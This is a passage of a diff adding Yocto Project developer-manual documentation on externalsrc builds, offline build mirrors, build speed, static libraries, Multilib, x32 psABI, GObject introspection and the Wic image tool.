+project and maintain everyone's workflow as much as possible. In this
+case, you want a kernel source directory on the development machine
+where the development occurs. You want the recipe's
+:term:`SRC_URI` variable to point to
+the external directory and use it as is, not copy it.
+
+To build from software that comes from an external source, all you need
+to do is inherit the
+:ref:`externalsrc <ref-classes-externalsrc>` class
+and then set the
+:term:`EXTERNALSRC` variable to
+point to your external source code. Here are the statements to put in
+your ``local.conf`` file:
+::
+
+ INHERIT += "externalsrc"
+ EXTERNALSRC_pn-myrecipe = "path-to-your-source-tree"
+
+This next example shows how to accomplish the same thing by setting
+``EXTERNALSRC`` in the recipe itself or in the recipe's append file:
+::
+
+ EXTERNALSRC = "path"
+ EXTERNALSRC_BUILD = "path"
+
+.. note::
+
+ In order for these settings to take effect, you must globally or
+ locally inherit the :ref:`externalsrc <ref-classes-externalsrc>`
+ class.
+
+By default, ``externalsrc.bbclass`` builds the source code in a
+directory separate from the external source directory as specified by
+:term:`EXTERNALSRC`. If you need
+to have the source built in the same directory in which it resides, or
+some other nominated directory, you can set
+:term:`EXTERNALSRC_BUILD`
+to point to that directory:
+::
+
+ EXTERNALSRC_BUILD_pn-myrecipe = "path-to-your-source-tree"
+
+Replicating a Build Offline
+---------------------------
+
+It can be useful to take a "snapshot" of upstream sources used in a
+build and then use that "snapshot" later to replicate the build offline.
+To do so, you need to first prepare and populate your downloads
+directory your "snapshot" of files. Once your downloads directory is
+ready, you can use it at any time and from any machine to replicate your
+build.
+
+Follow these steps to populate your Downloads directory:
+
+1. *Create a Clean Downloads Directory:* Start with an empty downloads
+ directory (:term:`DL_DIR`). You
+ start with an empty downloads directory by either removing the files
+ in the existing directory or by setting ``DL_DIR`` to point to either
+ an empty location or one that does not yet exist.
+
+2. *Generate Tarballs of the Source Git Repositories:* Edit your
+ ``local.conf`` configuration file as follows:
+ ::
+
+ DL_DIR = "/home/your-download-dir/"
+ BB_GENERATE_MIRROR_TARBALLS = "1"
+
+ During
+ the fetch process in the next step, BitBake gathers the source files
+ and creates tarballs in the directory pointed to by ``DL_DIR``. See
+ the
+ :term:`BB_GENERATE_MIRROR_TARBALLS`
+ variable for more information.
+
+3. *Populate Your Downloads Directory Without Building:* Use BitBake to
+ fetch your sources but inhibit the build:
+ ::
+
+ $ bitbake target --runonly=fetch
+
+ The downloads directory (i.e. ``${DL_DIR}``) now has
+ a "snapshot" of the source files in the form of tarballs, which can
+ be used for the build.
+
+4. *Optionally Remove Any Git or other SCM Subdirectories From the
+ Downloads Directory:* If you want, you can clean up your downloads
+ directory by removing any Git or other Source Control Management
+ (SCM) subdirectories such as ``${DL_DIR}/git2/*``. The tarballs
+ already contain these subdirectories.
+
+Once your downloads directory has everything it needs regarding source
+files, you can create your "own-mirror" and build your target.
+Understand that you can use the files to build the target offline from
+any machine and at any time.
+
+Follow these steps to build your target using the files in the downloads
+directory:
+
+1. *Using Local Files Only:* Inside your ``local.conf`` file, add the
+ :term:`SOURCE_MIRROR_URL`
+ variable, inherit the
+ :ref:`own-mirrors <ref-classes-own-mirrors>`
+ class, and use the
+ :term:`bitbake:BB_NO_NETWORK`
+ variable to your ``local.conf``.
+ ::
+
+ SOURCE_MIRROR_URL ?= "file:///home/your-download-dir/"
+ INHERIT += "own-mirrors"
+ BB_NO_NETWORK = "1"
+
+ The ``SOURCE_MIRROR_URL`` and ``own-mirror``
+ class set up the system to use the downloads directory as your "own
+ mirror". Using the ``BB_NO_NETWORK`` variable makes sure that
+ BitBake's fetching process in step 3 stays local, which means files
+ from your "own-mirror" are used.
+
+2. *Start With a Clean Build:* You can start with a clean build by
+ removing the
+ ``${``\ :term:`TMPDIR`\ ``}``
+ directory or using a new :term:`Build Directory`.
+
+3. *Build Your Target:* Use BitBake to build your target:
+ ::
+
+ $ bitbake target
+
+ The build completes using the known local "snapshot" of source
+ files from your mirror. The resulting tarballs for your "snapshot" of
+ source files are in the downloads directory.
+
+ .. note::
+
+ The offline build does not work if recipes attempt to find the
+ latest version of software by setting
+ :term:`SRCREV` to
+ ``${``\ :term:`AUTOREV`\ ``}``:
+ ::
+
+ SRCREV = "${AUTOREV}"
+
+ When a recipe sets ``SRCREV`` to
+ ``${AUTOREV}``, the build system accesses the network in an
+ attempt to determine the latest version of software from the SCM.
+ Typically, recipes that use ``AUTOREV`` are custom or modified
+ recipes. Recipes that reside in public repositories usually do not
+ use ``AUTOREV``.
+
+ If you do have recipes that use ``AUTOREV``, you can take steps to
+ still use the recipes in an offline build. Do the following:
+
+ 1. Use a configuration generated by enabling `build
+ history <#maintaining-build-output-quality>`__.
+
+ 2. Use the ``buildhistory-collect-srcrevs`` command to collect the
+ stored ``SRCREV`` values from the build's history. For more
+ information on collecting these values, see the "`Build History
+ Package Information <#build-history-package-information>`__"
+ section.
+
+ 3. Once you have the correct source revisions, you can modify
+ those recipes to to set ``SRCREV`` to specific versions of the
+ software.
+
+Speeding Up a Build
+===================
+
+Build time can be an issue. By default, the build system uses simple
+controls to try and maximize build efficiency. In general, the default
+settings for all the following variables result in the most efficient
+build times when dealing with single socket systems (i.e. a single CPU).
+If you have multiple CPUs, you might try increasing the default values
+to gain more speed. See the descriptions in the glossary for each
+variable for more information:
+
+- :term:`BB_NUMBER_THREADS`:
+ The maximum number of threads BitBake simultaneously executes.
+
+- :term:`bitbake:BB_NUMBER_PARSE_THREADS`:
+ The number of threads BitBake uses during parsing.
+
+- :term:`PARALLEL_MAKE`: Extra
+ options passed to the ``make`` command during the
+ :ref:`ref-tasks-compile` task in
+ order to specify parallel compilation on the local build host.
+
+- :term:`PARALLEL_MAKEINST`:
+ Extra options passed to the ``make`` command during the
+ :ref:`ref-tasks-install` task in
+ order to specify parallel installation on the local build host.
+
+As mentioned, these variables all scale to the number of processor cores
+available on the build system. For single socket systems, this
+auto-scaling ensures that the build system fundamentally takes advantage
+of potential parallel operations during the build based on the build
+machine's capabilities.
+
+Following are additional factors that can affect build speed:
+
+- File system type: The file system type that the build is being
+ performed on can also influence performance. Using ``ext4`` is
+ recommended as compared to ``ext2`` and ``ext3`` due to ``ext4``
+ improved features such as extents.
+
+- Disabling the updating of access time using ``noatime``: The
+ ``noatime`` mount option prevents the build system from updating file
+ and directory access times.
+
+- Setting a longer commit: Using the "commit=" mount option increases
+ the interval in seconds between disk cache writes. Changing this
+ interval from the five second default to something longer increases
+ the risk of data loss but decreases the need to write to the disk,
+ thus increasing the build performance.
+
+- Choosing the packaging backend: Of the available packaging backends,
+ IPK is the fastest. Additionally, selecting a singular packaging
+ backend also helps.
+
+- Using ``tmpfs`` for :term:`TMPDIR`
+ as a temporary file system: While this can help speed up the build,
+ the benefits are limited due to the compiler using ``-pipe``. The
+ build system goes to some lengths to avoid ``sync()`` calls into the
+ file system on the principle that if there was a significant failure,
+ the :term:`Build Directory`
+ contents could easily be rebuilt.
+
+- Inheriting the
+ :ref:`rm_work <ref-classes-rm-work>` class:
+ Inheriting this class has shown to speed up builds due to
+ significantly lower amounts of data stored in the data cache as well
+ as on disk. Inheriting this class also makes cleanup of
+ :term:`TMPDIR` faster, at the
+ expense of being easily able to dive into the source code. File
+ system maintainers have recommended that the fastest way to clean up
+ large numbers of files is to reformat partitions rather than delete
+ files due to the linear nature of partitions. This, of course,
+ assumes you structure the disk partitions and file systems in a way
+ that this is practical.
+
+Aside from the previous list, you should keep some trade offs in mind
+that can help you speed up the build:
+
+- Remove items from
+ :term:`DISTRO_FEATURES`
+ that you might not need.
+
+- Exclude debug symbols and other debug information: If you do not need
+ these symbols and other debug information, disabling the ``*-dbg``
+ package generation can speed up the build. You can disable this
+ generation by setting the
+ :term:`INHIBIT_PACKAGE_DEBUG_SPLIT`
+ variable to "1".
+
+- Disable static library generation for recipes derived from
+ ``autoconf`` or ``libtool``: Following is an example showing how to
+ disable static libraries and still provide an override to handle
+ exceptions:
+ ::
+
+ STATICLIBCONF = "--disable-static"
+ STATICLIBCONF_sqlite3-native = ""
+ EXTRA_OECONF += "${STATICLIBCONF}"
+
+ .. note::
+
+ - Some recipes need static libraries in order to work correctly
+ (e.g. ``pseudo-native`` needs ``sqlite3-native``). Overrides,
+ as in the previous example, account for these kinds of
+ exceptions.
+
+ - Some packages have packaging code that assumes the presence of
+ the static libraries. If so, you might need to exclude them as
+ well.
+
+.. _platdev-working-with-libraries:
+
+Working With Libraries
+======================
+
+Libraries are an integral part of your system. This section describes
+some common practices you might find helpful when working with libraries
+to build your system:
+
+- `How to include static library
+ files <#including-static-library-files>`__
+
+- `How to use the Multilib feature to combine multiple versions of
+ library files into a single
+ image <#combining-multiple-versions-library-files-into-one-image>`__
+
+- `How to install multiple versions of the same library in parallel on
+ the same
+ system <#installing-multiple-versions-of-the-same-library>`__
+
+Including Static Library Files
+------------------------------
+
+If you are building a library and the library offers static linking, you
+can control which static library files (``*.a`` files) get included in
+the built library.
+
+The :term:`PACKAGES` and
+:term:`FILES_* <FILES>` variables in the
+``meta/conf/bitbake.conf`` configuration file define how files installed
+by the ``do_install`` task are packaged. By default, the ``PACKAGES``
+variable includes ``${PN}-staticdev``, which represents all static
+library files.
+
+.. note::
+
+ Some previously released versions of the Yocto Project defined the
+ static library files through ``${PN}-dev``.
+
+Following is part of the BitBake configuration file, where you can see
+how the static library files are defined:
+::
+
+ PACKAGE_BEFORE_PN ?= ""
+ PACKAGES = "${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}"
+ PACKAGES_DYNAMIC = "^${PN}-locale-.*"
+ FILES = ""
+
+ FILES_${PN} = "${bindir}/* ${sbindir}/* ${libexecdir}/* ${libdir}/lib*${SOLIBS} \
+ ${sysconfdir} ${sharedstatedir} ${localstatedir} \
+ ${base_bindir}/* ${base_sbindir}/* \
+ ${base_libdir}/*${SOLIBS} \
+ ${base_prefix}/lib/udev/rules.d ${prefix}/lib/udev/rules.d \
+ ${datadir}/${BPN} ${libdir}/${BPN}/* \
+ ${datadir}/pixmaps ${datadir}/applications \
+ ${datadir}/idl ${datadir}/omf ${datadir}/sounds \
+ ${libdir}/bonobo/servers"
+
+ FILES_${PN}-bin = "${bindir}/* ${sbindir}/*"
+
+ FILES_${PN}-doc = "${docdir} ${mandir} ${infodir} ${datadir}/gtk-doc \
+ ${datadir}/gnome/help"
+ SECTION_${PN}-doc = "doc"
+
+ FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
+ FILES_${PN}-dev = "${includedir} ${FILES_SOLIBSDEV} ${libdir}/*.la \
+ ${libdir}/*.o ${libdir}/pkgconfig ${datadir}/pkgconfig \
+ ${datadir}/aclocal ${base_libdir}/*.o \
+ ${libdir}/${BPN}/*.la ${base_libdir}/*.la"
+ SECTION_${PN}-dev = "devel"
+ ALLOW_EMPTY_${PN}-dev = "1"
+ RDEPENDS_${PN}-dev = "${PN} (= ${EXTENDPKGV})"
+
+ FILES_${PN}-staticdev = "${libdir}/*.a ${base_libdir}/*.a ${libdir}/${BPN}/*.a"
+ SECTION_${PN}-staticdev = "devel"
+ RDEPENDS_${PN}-staticdev = "${PN}-dev (= ${EXTENDPKGV})"
+
+.. _combining-multiple-versions-library-files-into-one-image:
+
+Combining Multiple Versions of Library Files into One Image
+-----------------------------------------------------------
+
+The build system offers the ability to build libraries with different
+target optimizations or architecture formats and combine these together
+into one system image. You can link different binaries in the image
+against the different libraries as needed for specific use cases. This
+feature is called "Multilib".
+
+An example would be where you have most of a system compiled in 32-bit
+mode using 32-bit libraries, but you have something large, like a
+database engine, that needs to be a 64-bit application and uses 64-bit
+libraries. Multilib allows you to get the best of both 32-bit and 64-bit
+libraries.
+
+While the Multilib feature is most commonly used for 32 and 64-bit
+differences, the approach the build system uses facilitates different
+target optimizations. You could compile some binaries to use one set of
+libraries and other binaries to use a different set of libraries. The
+libraries could differ in architecture, compiler options, or other
+optimizations.
+
+Several examples exist in the ``meta-skeleton`` layer found in the
+:term:`Source Directory`:
+
+- ``conf/multilib-example.conf`` configuration file
+
+- ``conf/multilib-example2.conf`` configuration file
+
+- ``recipes-multilib/images/core-image-multilib-example.bb`` recipe
+
+Preparing to Use Multilib
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+User-specific requirements drive the Multilib feature. Consequently,
+there is no one "out-of-the-box" configuration that likely exists to
+meet your needs.
+
+In order to enable Multilib, you first need to ensure your recipe is
+extended to support multiple libraries. Many standard recipes are
+already extended and support multiple libraries. You can check in the
+``meta/conf/multilib.conf`` configuration file in the
+:term:`Source Directory` to see how this is
+done using the
+:term:`BBCLASSEXTEND` variable.
+Eventually, all recipes will be covered and this list will not be
+needed.
+
+For the most part, the Multilib class extension works automatically to
+extend the package name from ``${PN}`` to ``${MLPREFIX}${PN}``, where
+``MLPREFIX`` is the particular multilib (e.g. "lib32-" or "lib64-").
+Standard variables such as
+:term:`DEPENDS`,
+:term:`RDEPENDS`,
+:term:`RPROVIDES`,
+:term:`RRECOMMENDS`,
+:term:`PACKAGES`, and
+:term:`PACKAGES_DYNAMIC` are
+automatically extended by the system. If you are extending any manual
+code in the recipe, you can use the ``${MLPREFIX}`` variable to ensure
+those names are extended correctly. This automatic extension code
+resides in ``multilib.bbclass``.
+
+Using Multilib
+~~~~~~~~~~~~~~
+
+After you have set up the recipes, you need to define the actual
+combination of multiple libraries you want to build. You accomplish this
+through your ``local.conf`` configuration file in the
+:term:`Build Directory`. An example
+configuration would be as follows:
+::
+
+ MACHINE = "qemux86-64"
+ require conf/multilib.conf
+ MULTILIBS = "multilib:lib32"
+ DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
+ IMAGE_INSTALL_append = " lib32-glib-2.0"
+
+This example enables an additional library named
+``lib32`` alongside the normal target packages. When combining these
+"lib32" alternatives, the example uses "x86" for tuning. For information
+on this particular tuning, see
+``meta/conf/machine/include/ia32/arch-ia32.inc``.
+
+The example then includes ``lib32-glib-2.0`` in all the images, which
+illustrates one method of including a multiple library dependency. You
+can use a normal image build to include this dependency, for example:
+::
+
+ $ bitbake core-image-sato
+
+You can also build Multilib packages
+specifically with a command like this:
+::
+
+ $ bitbake lib32-glib-2.0
+
+Additional Implementation Details
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Generic implementation details as well as details that are specific to
+package management systems exist. Following are implementation details
+that exist regardless of the package management system:
+
+- The typical convention used for the class extension code as used by
+ Multilib assumes that all package names specified in
+ :term:`PACKAGES` that contain
+ ``${PN}`` have ``${PN}`` at the start of the name. When that
+ convention is not followed and ``${PN}`` appears at the middle or the
+ end of a name, problems occur.
+
+- The :term:`TARGET_VENDOR`
+ value under Multilib will be extended to "-vendormlmultilib" (e.g.
+ "-pokymllib32" for a "lib32" Multilib with Poky). The reason for this
+ slightly unwieldy contraction is that any "-" characters in the
+ vendor string presently break Autoconf's ``config.sub``, and other
+ separators are problematic for different reasons.
+
+For the RPM Package Management System, the following implementation
+details exist:
+
+- A unique architecture is defined for the Multilib packages, along
+ with creating a unique deploy folder under ``tmp/deploy/rpm`` in the
+ :term:`Build Directory`. For
+ example, consider ``lib32`` in a ``qemux86-64`` image. The possible
+ architectures in the system are "all", "qemux86_64",
+ "lib32_qemux86_64", and "lib32_x86".
+
+- The ``${MLPREFIX}`` variable is stripped from ``${PN}`` during RPM
+ packaging. The naming for a normal RPM package and a Multilib RPM
+ package in a ``qemux86-64`` system resolves to something similar to
+ ``bash-4.1-r2.x86_64.rpm`` and ``bash-4.1.r2.lib32_x86.rpm``,
+ respectively.
+
+- When installing a Multilib image, the RPM backend first installs the
+ base image and then installs the Multilib libraries.
+
+- The build system relies on RPM to resolve the identical files in the
+ two (or more) Multilib packages.
+
+For the IPK Package Management System, the following implementation
+details exist:
+
+- The ``${MLPREFIX}`` is not stripped from ``${PN}`` during IPK
+ packaging. The naming for a normal RPM package and a Multilib IPK
+ package in a ``qemux86-64`` system resolves to something like
+ ``bash_4.1-r2.x86_64.ipk`` and ``lib32-bash_4.1-rw_x86.ipk``,
+ respectively.
+
+- The IPK deploy folder is not modified with ``${MLPREFIX}`` because
+ packages with and without the Multilib feature can exist in the same
+ folder due to the ``${PN}`` differences.
+
+- IPK defines a sanity check for Multilib installation using certain
+ rules for file comparison, overridden, etc.
+
+Installing Multiple Versions of the Same Library
+------------------------------------------------
+
+Situations can exist where you need to install and use multiple versions
+of the same library on the same system at the same time. These
+situations almost always exist when a library API changes and you have
+multiple pieces of software that depend on the separate versions of the
+library. To accommodate these situations, you can install multiple
+versions of the same library in parallel on the same system.
+
+The process is straightforward as long as the libraries use proper
+versioning. With properly versioned libraries, all you need to do to
+individually specify the libraries is create separate, appropriately
+named recipes where the :term:`PN` part of
+the name includes a portion that differentiates each library version
+(e.g. the major part of the version number). Thus, instead of having a
+single recipe that loads one version of a library (e.g. ``clutter``),
+you provide multiple recipes that result in different versions of the
+libraries you want. As an example, the following two recipes would allow
+the two separate versions of the ``clutter`` library to co-exist on the
+same system:
+
+.. code-block:: none
+
+ clutter-1.6_1.6.20.bb
+ clutter-1.8_1.8.4.bb
+
+Additionally, if
+you have other recipes that depend on a given library, you need to use
+the :term:`DEPENDS` variable to
+create the dependency. Continuing with the same example, if you want to
+have a recipe depend on the 1.8 version of the ``clutter`` library, use
+the following in your recipe:
+::
+
+ DEPENDS = "clutter-1.8"
+
+Using x32 psABI
+===============
+
+x32 processor-specific Application Binary Interface (`x32
+psABI <https://software.intel.com/en-us/node/628948>`__) is a native
+32-bit processor-specific ABI for Intel 64 (x86-64) architectures. An
+ABI defines the calling conventions between functions in a processing
+environment. The interface determines what registers are used and what
+the sizes are for various C data types.
+
+Some processing environments prefer using 32-bit applications even when
+running on Intel 64-bit platforms. Consider the i386 psABI, which is a
+very old 32-bit ABI for Intel 64-bit platforms. The i386 psABI does not
+provide efficient use and access of the Intel 64-bit processor
+resources, leaving the system underutilized. Now consider the x86_64
+psABI. This ABI is newer and uses 64-bits for data sizes and program
+pointers. The extra bits increase the footprint size of the programs,
+libraries, and also increases the memory and file system size
+requirements. Executing under the x32 psABI enables user programs to
+utilize CPU and system resources more efficiently while keeping the
+memory footprint of the applications low. Extra bits are used for
+registers but not for addressing mechanisms.
+
+The Yocto Project supports the final specifications of x32 psABI as
+follows:
+
+- You can create packages and images in x32 psABI format on x86_64
+ architecture targets.
+
+- You can successfully build recipes with the x32 toolchain.
+
+- You can create and boot ``core-image-minimal`` and
+ ``core-image-sato`` images.
+
+- RPM Package Manager (RPM) support exists for x32 binaries.
+
+- Support for large images exists.
+
+To use the x32 psABI, you need to edit your ``conf/local.conf``
+configuration file as follows:
+::
+
+ MACHINE = "qemux86-64"
+ DEFAULTTUNE = "x86-64-x32"
+ baselib = "${@d.getVar('BASE_LIB_tune-' + (d.getVar('DEFAULTTUNE') \
+ or 'INVALID')) or 'lib'}"
+
+Once you have set
+up your configuration file, use BitBake to build an image that supports
+the x32 psABI. Here is an example:
+::
+
+ $ bitbake core-image-sato
+
+Enabling GObject Introspection Support
+======================================
+
+`GObject
+introspection <https://wiki.gnome.org/Projects/GObjectIntrospection>`__
+is the standard mechanism for accessing GObject-based software from
+runtime environments. GObject is a feature of the GLib library that
+provides an object framework for the GNOME desktop and related software.
+GObject Introspection adds information to GObject that allows objects
+created within it to be represented across different programming
+languages. If you want to construct GStreamer pipelines using Python, or
+control UPnP infrastructure using Javascript and GUPnP, GObject
+introspection is the only way to do it.
+
+This section describes the Yocto Project support for generating and
+packaging GObject introspection data. GObject introspection data is a
+description of the API provided by libraries built on top of GLib
+framework, and, in particular, that framework's GObject mechanism.
+GObject Introspection Repository (GIR) files go to ``-dev`` packages,
+``typelib`` files go to main packages as they are packaged together with
+libraries that are introspected.
+
+The data is generated when building such a library, by linking the
+library with a small executable binary that asks the library to describe
+itself, and then executing the binary and processing its output.
+
+Generating this data in a cross-compilation environment is difficult
+because the library is produced for the target architecture, but its
+code needs to be executed on the build host. This problem is solved with
+the OpenEmbedded build system by running the code through QEMU, which
+allows precisely that. Unfortunately, QEMU does not always work
+perfectly as mentioned in the "`Known Issues <#known-issues>`__"
+section.
+
+Enabling the Generation of Introspection Data
+---------------------------------------------
+
+Enabling the generation of introspection data (GIR files) in your
+library package involves the following:
+
+1. Inherit the
+ :ref:`gobject-introspection <ref-classes-gobject-introspection>`
+ class.
+
+2. Make sure introspection is not disabled anywhere in the recipe or
+ from anything the recipe includes. Also, make sure that
+ "gobject-introspection-data" is not in
+ :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+ and that "qemu-usermode" is not in
+ :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`.
+ If either of these conditions exist, nothing will happen.
+
+3. Try to build the recipe. If you encounter build errors that look like
+ something is unable to find ``.so`` libraries, check where these
+ libraries are located in the source tree and add the following to the
+ recipe:
+ ::
+
+ GIR_EXTRA_LIBS_PATH = "${B}/something/.libs"
+
+ .. note::
+
+ See recipes in the ``oe-core`` repository that use that
+ ``GIR_EXTRA_LIBS_PATH`` variable as an example.
+
+4. Look for any other errors, which probably mean that introspection
+ support in a package is not entirely standard, and thus breaks down
+ in a cross-compilation environment. For such cases, custom-made fixes
+ are needed. A good place to ask and receive help in these cases is
+ the :ref:`Yocto Project mailing
+ lists <resources-mailinglist>`.
+
+.. note::
+
+ Using a library that no longer builds against the latest Yocto
+ Project release and prints introspection related errors is a good
+ candidate for the previous procedure.
+
+Disabling the Generation of Introspection Data
+----------------------------------------------
+
+You might find that you do not want to generate introspection data. Or,
+perhaps QEMU does not work on your build host and target architecture
+combination. If so, you can use either of the following methods to
+disable GIR file generations:
+
+- Add the following to your distro configuration:
+ ::
+
+ DISTRO_FEATURES_BACKFILL_CONSIDERED = "gobject-introspection-data"
+
+ Adding this statement disables generating introspection data using
+ QEMU but will still enable building introspection tools and libraries
+ (i.e. building them does not require the use of QEMU).
+
+- Add the following to your machine configuration:
+ ::
+
+ MACHINE_FEATURES_BACKFILL_CONSIDERED = "qemu-usermode"
+
+ Adding this statement disables the use of QEMU when building packages for your
+ machine. Currently, this feature is used only by introspection
+ recipes and has the same effect as the previously described option.
+
+ .. note::
+
+ Future releases of the Yocto Project might have other features
+ affected by this option.
+
+If you disable introspection data, you can still obtain it through other
+means such as copying the data from a suitable sysroot, or by generating
+it on the target hardware. The OpenEmbedded build system does not
+currently provide specific support for these techniques.
+
+Testing that Introspection Works in an Image
+--------------------------------------------
+
+Use the following procedure to test if generating introspection data is
+working in an image:
+
+1. Make sure that "gobject-introspection-data" is not in
+ :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+ and that "qemu-usermode" is not in
+ :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`.
+
+2. Build ``core-image-sato``.
+
+3. Launch a Terminal and then start Python in the terminal.
+
+4. Enter the following in the terminal:
+ ::
+
+ >>> from gi.repository import GLib
+ >>> GLib.get_host_name()
+
+5. For something a little more advanced, enter the following see:
+ https://python-gtk-3-tutorial.readthedocs.io/en/latest/introduction.html
+
+Known Issues
+------------
+
+The following know issues exist for GObject Introspection Support:
+
+- ``qemu-ppc64`` immediately crashes. Consequently, you cannot build
+ introspection data on that architecture.
+
+- x32 is not supported by QEMU. Consequently, introspection data is
+ disabled.
+
+- musl causes transient GLib binaries to crash on assertion failures.
+ Consequently, generating introspection data is disabled.
+
+- Because QEMU is not able to run the binaries correctly, introspection
+ is disabled for some specific packages under specific architectures
+ (e.g. ``gcr``, ``libsecret``, and ``webkit``).
+
+- QEMU usermode might not work properly when running 64-bit binaries
+ under 32-bit host machines. In particular, "qemumips64" is known to
+ not work under i686.
+
+.. _dev-optionally-using-an-external-toolchain:
+
+Optionally Using an External Toolchain
+======================================
+
+You might want to use an external toolchain as part of your development.
+If this is the case, the fundamental steps you need to accomplish are as
+follows:
+
+- Understand where the installed toolchain resides. For cases where you
+ need to build the external toolchain, you would need to take separate
+ steps to build and install the toolchain.
+
+- Make sure you add the layer that contains the toolchain to your
+ ``bblayers.conf`` file through the
+ :term:`BBLAYERS` variable.
+
+- Set the ``EXTERNAL_TOOLCHAIN`` variable in your ``local.conf`` file
+ to the location in which you installed the toolchain.
+
+A good example of an external toolchain used with the Yocto Project is
+Mentor Graphics Sourcery G++ Toolchain. You can see information on how
+to use that particular layer in the ``README`` file at
+https://github.com/MentorEmbedded/meta-sourcery/. You can find
+further information by reading about the
+:term:`TCMODE` variable in the Yocto
+Project Reference Manual's variable glossary.
+
+Creating Partitioned Images Using Wic
+=====================================
+
+Creating an image for a particular hardware target using the
+OpenEmbedded build system does not necessarily mean you can boot that
+image as is on your device. Physical devices accept and boot images in
+various ways depending on the specifics of the device. Usually,
+information about the hardware can tell you what image format the device
+requires. Should your device require multiple partitions on an SD card,
+flash, or an HDD, you can use the OpenEmbedded Image Creator, Wic, to
+create the properly partitioned image.
+
+The ``wic`` command generates partitioned images from existing
+OpenEmbedded build artifacts. Image generation is driven by partitioning
+commands contained in an Openembedded kickstart file (``.wks``)
+specified either directly on the command line or as one of a selection
+of canned kickstart files as shown with the ``wic list images`` command
+in the "`Using an Existing Kickstart
+File <#using-a-provided-kickstart-file>`__" section. When you apply the
+command to a given set of build artifacts, the result is an image or set
+of images that can be directly written onto media and used on a
+particular system.
+
+.. note::
+
+ For a kickstart file reference, see the
+ ":ref:`ref-manual/ref-kickstart:openembedded kickstart (\`\`.wks\`\`) reference`"
+ Chapter in the Yocto Project Reference Manual.
+
+The ``wic`` command and the infrastructure it is based on is by
+definition incomplete. The purpose of the command is to allow the
+generation of customized images, and as such, was designed to be
+completely extensible through a plugin interface. See the "`Using the
+Wic PlugIn Interface <#wic-using-the-wic-plugin-interface>`__" section
+for information on these plugins.
+
+This section provides some background information on Wic, describes what
+you need to have in place to run the tool, provides instruction on how
+to use the Wic utility, provides information on using the Wic plugins
+interface, and provides several examples that show how to use Wic.
+
+.. _wic-background:
+
+Background
+----------
+
+This section provides some background on the Wic utility. While none of
+this information is required to use Wic, you might find it interesting.
+
+- The name "Wic" is derived from OpenEmbedded Image Creator (oeic). The
+ "oe" diphthong in "oeic" was promoted to the letter "w", because
+ "oeic" is both difficult to remember and to pronounce.
+
+- Wic is loosely based on the Meego Image Creator (``mic``) framework.
+ The Wic implementation has been heavily modified to make direct use
+ of OpenEmbedded build artifacts instead of package installation and
+ configuration, which are already incorporated within the OpenEmbedded
+ artifacts.
+
+- Wic is a completely independent standalone utility that initially
+ provides easier-to-use and more flexible replacements for an existing
+ functionality in OE-Core's
+ :ref:`image-live <ref-classes-image-live>`
+ class. The difference between Wic and those examples is that with Wic
+ the functionality of those scripts is implemented by a
+ general-purpose partitioning language, which is based on Redhat
+ kickstart syntax.
+
+.. _wic-requirements:
+
+Requirements
+------------
+
+In order to use the Wic utility with the OpenEmbedded Build system, your
+system needs to meet the following requirements:
+
+- The Linux distribution on your development host must support the
+ Yocto Project. See the ":ref:`detailed-supported-distros`"
+ section in the Yocto Project Reference Manual for the list of
+ distributions that support the Yocto Project.
+
+- The standard system utilities, such as ``cp``, must be installed on
+ your development host system.
+
+- You must have sourced the build environment setup script (i.e.
+ :ref:`structure-core-script`) found in the
+ :term:`Build Directory`.
+
+- You need to have the build artifacts already available, which
+ typically means that you must have already created an image using the
+ Openembedded build system (e.g. ``core-image-minimal``). While it
+ might seem redundant to generate an image in order to create an image
+ using Wic, the current version of Wic requires the artifacts in the
+ form generated by the OpenEmbedded build system.
+
+- You must build several native tools, which are built to run on the
+ build system:
+ ::
+
+ $ bitbake parted-native dosfstools-native mtools-native
+
+- Include "wic" as part of the
+ :term:`IMAGE_FSTYPES`
+ variable.
+
+- Include the name of the :ref:`wic kickstart file <openembedded-kickstart-wks-reference>`
+ as part of the :term:`WKS_FILE` variable
+
+.. _wic-getting-help:
+
+Getting Help
+------------
+
+You can get general help for the ``wic`` command by entering the ``wic``
+command by itself or by entering the command with a help argument as
+follows:
+::
+
+ $ wic -h
+ $ wic --help
+ $ wic help
+
+Currently, Wic supports seven commands: ``cp``, ``create``, ``help``,
+``list``, ``ls``, ``rm``, and ``write``. You can get help for all these
+commands except "help" by using the following form:
+::
+
+ $ wic help command
+
+For example, the following command returns help for the ``write``
+command:
+::
+
+ $ wic help write
+
+Wic supports help for three topics: ``overview``, ``plugins``, and
+``kickstart``. You can get help for any topic using the following form:
+::
+
+ $ wic help topic
+
+For example, the following returns overview help for Wic:
+::
+
+ $ wic help overview
+
+One additional level of help exists for Wic. You can get help on
+individual images through the ``list`` command. You can use the ``list``
+command to return the available Wic images as follows:
+::
+
+ $ wic list images
+ genericx86 Create an EFI disk image for genericx86*
+ beaglebone-yocto Create SD card image for Beaglebone
+ edgerouter Create SD card image for Edgerouter
+ qemux86-directdisk Create a qemu machine 'pcbios' direct disk image
+ directdisk-gpt Create a 'pcbios' direct disk image
+ mkefidisk Create an EFI disk image
+ directdisk Create a 'pcbios' direct disk image
+ systemd-bootdisk Create an EFI disk image with systemd-boot
+ mkhybridiso Create a hybrid ISO image
+ sdimage-bootpart Create SD card image with a boot partition
+ directdisk-multi-rootfs Create multi rootfs image using rootfs plugin
+ directdisk-bootloader-config Create a 'pcbios' direct disk image with custom bootloader config
+
+Once you know the list of available
+Wic images, you can use ``help`` with the command to get help on a
+particular image. For example, the following command returns help on the
+"beaglebone-yocto" image:
+::
+
+ $ wic list beaglebone-yocto help
+
+ Creates a partitioned SD card image for Beaglebone.
+ Boot files are located in the first vfat partition.
+
+Operational Modes
+-----------------
+
+You can use Wic in two different modes, depending on how much control
+you need for specifying the Openembedded build artifacts that are used
+for creating the image: Raw and Cooked:
+
+- *Raw Mode:* You explicitly specify build artifacts through Wic
+ command-line arguments.
+
+- *Cooked Mode:* The current
+ :term:`MACHINE` setting and image
+ name are used to automatically locate and provide the build
+ artifacts. You just supply a kickstart file and the name of the image
